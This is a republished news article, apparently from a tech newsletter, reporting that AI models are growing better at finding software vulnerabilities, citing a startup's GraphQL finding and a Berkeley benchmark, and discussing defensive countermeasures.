AI’s Hacking Skills Are Approaching an ‘Inflection Point’

0
business-news-2-768x548.jpg


Vlad Ionescu and Ariel Herbert-Voss, cofounder of the cyber security start up RunSybilwere momentarily confused when their AI tool, Sybil, warned them of a weakness in a client's systems last November.

Sybil uses a mix of different AI models– as well as a few proprietary technical tricks – to scan computer systems for problems that hackers can exploit, such as an unpatched server or a misconfigured database.

In this case Sybil flag a problem with the customer's deployment of federated GraphQL, a language used to specify how to access data over the web through application programming interfaces (APIs). The issue meant the customer inadvertently exposed confidential information.

What surprised Ionescu and Herbert-Voss was that spotting the problem required a remarkably deep knowledge of several different systems and how those systems interact. RunSybil says it has since found the same problem with other deployments of GraphQL — before anyone else made it public “We searched the Internet, and it didn't exist,” says Herbert-Voss. “Discovering it was a logical step in terms of the possibilities of models – a step change.”

The situation indicates an increasing risk. As AI models get smarter, their ability to find zero-day bugs and other vulnerabilities also continues to grow. The same intelligence that can be used to discover vulnerabilities can also be used to exploit them.

Dawn Songa computer scientist at UC Berkeley who specializes in both AI and security says that recent advances in AI have created models that are better at finding flaws. Simulated reasoning, which involves splitting problems into parts, and agentic AI, such as searching the web or installing and running software tools, have enhanced the cyber skills of models.

“The cyber security capabilities of frontier models have increased drastically in recent months,” she says. “This is an inflection point.”

Last year, Song created a benchmark with the name CyberGym to determine how well large language models find vulnerabilities in large open source software projects. CyberGym includes 1,507 known vulnerabilities found in 188 projects.

In July 2025, Anthropic's Claude Sonnet 4 was able to find about 20 percent of the vulnerabilities in the benchmark. By October 2025, a new model, Claude Sonnet 4.5, could identify 30 percent. “AI agents can find zero-days, and at very low cost,” says Song.

Song says this trend shows the need for new countermeasures, including having AI help cybersecurity experts. “We need to think about how you can really help AI more on the defense side, and one can explore different approaches,” she says.

One idea is for frontier AI companies to share models with security researchers before launch so they can use the models to find bugs and secure systems ahead of a general release.

Another countermeasure, Song says, is to think about how software is built in the first place. Her lab has shown that it is possible to use AI to generate code that is more secure than what most programmers use today. “In the long run, we think this secure-by-design approach will really help defenders,” says Song.

The RunSybil team says that, in the short term, the coding skills of AI models could mean that hackers gain the upper hand. “AI can generate actions on a computer and generate code, and those are two things that hackers do,” says Herbert-Voss. “If those capabilities accelerate, that means offensive security actions will also accelerate.”


This is an edition of Will Knight's AI Lab newsletter. Read previous newsletters over here.



Source link

Leave a Reply

Your email address will not be published. Required fields are marked *